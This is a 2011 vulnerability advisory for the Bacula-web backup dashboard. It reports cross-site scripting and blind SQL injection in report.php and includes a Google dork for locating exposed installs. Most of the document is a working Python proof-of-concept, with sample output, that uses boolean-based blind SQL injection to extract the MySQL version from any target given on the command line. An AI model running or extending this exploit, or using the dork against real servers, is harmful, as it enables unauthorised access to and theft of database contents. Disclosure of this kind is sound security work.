GotGeek Labs http://www.gotgeek.com.br/ Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities [+] Description Bacula-Web is a web based tool that provide you a summarized view of your bacula director. It obtain his information from your bacula catalog's database. It provide some usefull informations such as: * Last 24 hours jobs status (completed, failed, waiting, etc.) * Medias and Pool usage * Last 7 days storage usage The main advantages of this tool are * it's web based, so you can reach it simply through your preferred browser from anywhere * it's pretty easy to install (you just need a LAMP server with a valid Bacula catalog database connection) * it contain a lot of information into a single page (have a look on your last jobs for example) This is a fairly high level Bacula management tool. [+] Information Title: Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities Google Dork: intitle:bacula-web "Status" Advisory: gg-004-2011 Date: 02-22-2011 Last update: 03-04-2011 Link: http://www.gotgeek.com.br/pocs/gg-004-2011.txt Tested on: FreeBSD 7.2-RELEASE + MySQL 5.x [+] Vulnerabilities Cross-site Scripting: Bacula-web is affected by cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. XSS: http://target/bacula/report.php?default=1&server=Backup_inc Blind SQL Injection: Bacula-web is also affected by blind SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. *Blind SQLi: http://target/bacula/report.php?default=1&server=Backup_inc' and 1='2 #FALSE http://target/bacula/report.php?default=1&server=Backup_inc' and 1='1 #TRUE *Need a valid job name at server variable with some data to get false or true page. Affected Versions: (1)Bacula-web 5.0.3 (2)Bacula-web 1.38.9_1 (FreeBSD) Other versions may also be vulnerable. [+] Proof of Concept/Exploit # $ python bacula-web.py -t 10.1.1.1 -d /bacula/ -j Backup_inc -p 80 # # [*] gotgeek labs # [*] http://gotgeek.com.br # # # [*] Checking report.php... # [+] Found! # [*] Let's get MySQL version.. Wait a moment... # [+] MySQL: 5.0.84 # # [*]Done! #!/usr/bin/python # import sys import httplib, socket import urllib, re from optparse import OptionParser # You may also use "MB".. Check your target before! truestr = "GB" usage = "./%prog -t -d -j -p \n" usage+= "Example: ./%prog -t www.example.com -d /bacula-web/ -j BackupCatalog -p 80" parser = OptionParser(usage=usage) parser.add_option("-t", action="store", dest="target", help="target server") parser.add_option("-d", action="store", dest="dir", help="path to bacula-web") parser.add_option("-j", action="store", dest="job", help="bacula job name") parser.add_option("-p", action="store", dest="port", help="server port") (options, args) = parser.parse_args() def banner(): print "\n[*] gotgeek labs" print "[*] http://gotgeek.com.br\n\n" if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1) def checkurl(): try: print "[*] Checking report.php..." conn = httplib.HTTPConnection(options.target+":"+options.port) conn.request("GET", options.dir + "report.php") r1 = conn.getresponse() if r1.status == 200: print "[+] Found!" else: print "[-] NOT Found!\n\n" sys.exit(1) except socket.error, msg: print "[-] Can't connect to the target!\n\n" sys.exit(1) def geturl(sqli): try: check = urllib.urlopen("http://"+options.target+":"+options.port+options.dir+sqli).read() except: print "[-] Can't connect to the target!\n\n" sys.exit(1) return check def getmysql(gg): for i in range(43,58): request = ("report.php?default=1&server="+options.job+"'%20and%20ascii(substring(@@version,"+str(gg)+",1))='"+str(i)) result = geturl(request) if re.search(truestr,result): gg = gg+1 sys.stdout.write(chr(i)) sys.stdout.flush() getmysql(gg) break def main(): gg = 1 banner() checkurl() print "[*] Let's get MySQL version.. Wait a moment..." sys.stdout.write("[+] MySQL: ") getmysql(gg) print "\n\n[*]Done!\n\n" if __name__ == "__main__": main() [+] References (1)http://bacula-web.dflc.ch/index.php/home.html (2)http://www.freshports.org/www/bacula-web/ [+] Credits b0telh0